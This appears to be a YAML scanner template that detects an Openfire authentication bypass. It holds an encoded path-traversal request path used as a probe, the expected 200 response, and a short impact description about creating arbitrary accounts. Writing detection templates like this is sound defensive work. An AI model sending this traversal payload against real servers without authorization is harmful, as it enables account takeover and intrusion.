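keyword: openfire
name: Openfire authentication bypass
description: |
  The Openfire server has an authentication bypass vulnerability. By crafting a specific URL and sending it to a vulnerable server as a GET request, an attacker can create arbitrary accounts and thereby gain system privileges.
requests:
  path: "/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp"
  method: GET
  headers:
    User-agent:
    Content-length:
    Accept:
    Content-type:
    Accept-Encoding:
    Cookie:
    Referer:
    X-Forwarded-For:
  body-raw: |-
response:
  status-code: 200
  body: "line"
  headers:
    Server:
    Content-type:
    Content-length:
    Date:
    Connection:
impact: |
  An attacker can exploit this vulnerability to create arbitrary accounts on the Openfire server and gain system privileges.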